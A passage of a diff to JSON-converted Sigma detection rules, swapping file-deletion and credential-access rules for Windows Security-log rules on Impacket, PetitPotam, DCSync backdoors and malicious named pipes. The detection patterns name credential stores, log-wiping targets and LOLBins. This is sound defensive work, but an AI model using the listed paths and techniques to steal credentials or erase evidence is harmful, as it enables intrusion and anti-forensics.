Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Outgoing Logon with New Credentials", + "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], + "description": "Detects logon events that specify new credentials", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate remote administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_susp_logon_newcredentials.yml" }, { - "title": "File Deleted Via Sysinternals SDelete", - "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "status": "experimental", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "If source account name is not an admin then its super suspicious" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "status": "experimental", - "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Legitime usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", - "status": "experimental", - "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", + "status": "test", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "During uninstallation of the IIS service", - "During log rotation" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "TeamViewer Log File Deleted", - "id": "b1decb61-ed83-4339-8e95-53ea51901720", - "status": "test", - "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", - "author": "frack113", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "status": "experimental", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_teamviewer_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + "Intended inclusions by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (NewProcessName = 'System' AND ParentProcessName = 'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_generic_high.json b/rules/rules_windows_generic_high.json index 44fc46d..0f5d608 100644 --- a/rules/rules_windows_generic_high.json +++ b/rules/rules_windows_generic_high.json @@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": 